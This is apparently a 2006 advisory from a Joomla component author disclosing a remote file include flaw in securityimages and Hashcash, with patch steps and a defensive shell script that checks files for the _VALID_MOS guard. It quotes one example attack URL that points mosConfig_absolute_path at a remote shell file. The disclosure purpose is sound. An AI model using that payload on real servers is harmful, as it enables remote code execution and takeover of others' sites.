Tuesday, 01 August 2006 19:58

The webmaster of janwiersma.com sent me an email today at 6:12 AM: his server was hacked because of a bug in securityimages. This bug allows a remote attacker to execute commands via a remote file include (the affected files include and execute a file fetched from an attacker-chosen URL on your server) and affects ALL versions of securityimages <= 3.0.5.
Here are all the files which put your server at risk: client.php, configinsert.php, lang.php, server.php
Example of attack: http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt (from http://securityreason.com/exploitalert/892). Secunia also has a report on it: http://secunia.com/product/11186/
In fact I forgot to use that line in these files: defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); This prevents any request from accessing these files directly.
- upgrade to 3.0.6 (download at Joomla Forge or in my download section), OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
Please also contact all your friends who are using securityimages!
And for my other components?
Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!
- upgrade to 1.2.2 (download at Joomla Forge or in my download section), OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
JoomlaCloud is NOT affected
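For admins who patch by hand, the useful follow-up check is whether every PHP file in the component directory actually carries the guard. The guard works because Joomla's index.php defines _VALID_MOS before it includes a component file, so a direct HTTP request to the file finds the constant undefined and dies before any include runs. The POSIX shell audit below is an added example, not code from the component or its author: it builds a constructed sample directory (one patched file, one unpatched) and lists the files that still lack the guard. The directory name and file contents are made up for the demonstration.

```shell
#!/bin/sh
# Audit a Joomla 1.0 component directory for PHP files that can still be
# requested directly because they lack the _VALID_MOS guard.
# find_unguarded prints each unguarded file and returns 0 only when all
# files in the directory are guarded.

GUARD="defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');"

find_unguarded() {
    dir="$1"
    status=0
    for f in "$dir"/*.php; do
        [ -f "$f" ] || continue
        # A file that never tests _VALID_MOS runs its includes for any caller,
        # including a direct request that supplies mosConfig_absolute_path.
        if ! grep -q "_VALID_MOS" "$f"; then
            echo "UNGUARDED: $f"
            status=1
        fi
    done
    return $status
}

# Constructed sample tree (hypothetical, not the real component files):
# patched.php carries the guard, unpatched.php does not.
make_sample() {
    dir="$1"
    mkdir -p "$dir"
    printf '<?php\n%s\ninclude($mosConfig_absolute_path . "/configuration.php");\n' \
        "$GUARD" > "$dir/patched.php"
    printf '<?php\ninclude($mosConfig_absolute_path . "/configuration.php");\n' \
        > "$dir/unpatched.php"
}

SAMPLE_DIR="${TMPDIR:-/tmp}/com_securityimages_sample"
make_sample "$SAMPLE_DIR"
if find_unguarded "$SAMPLE_DIR"; then
    echo "all files guarded"
else
    echo "unguarded files found: add the _VALID_MOS line at the top of each"
fi
```

On a real installation, point find_unguarded at components/com_securityimages (and com_hashcash) instead of the sample directory; an empty listing means the hand patch is complete.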
YOU ARE ALL URGED TO UPGRADE ASAP!

Last Updated on Thursday, 17 August 2006 21:54